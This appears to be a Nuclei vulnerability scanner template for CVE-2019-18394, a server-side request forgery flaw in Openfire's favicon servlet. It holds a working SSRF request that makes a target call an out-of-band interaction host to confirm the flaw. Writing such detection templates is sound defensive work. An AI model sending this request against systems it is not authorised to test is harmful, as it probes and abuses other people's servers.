28 lines
836 B
YAML
28 lines
836 B
YAML
id: CVE-2019-18394
|
|
|
|
info:
|
|
name: Openfire Full Read SSRF
|
|
author: pdteam
|
|
severity: critical
|
|
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/openfire-admin-console/
|
|
- https://github.com/igniterealtime/Openfire/pull/1497
|
|
tags: cve,cve2019,ssrf,openfire,oast
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2019-18394
|
|
cwe-id: CWE-918
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|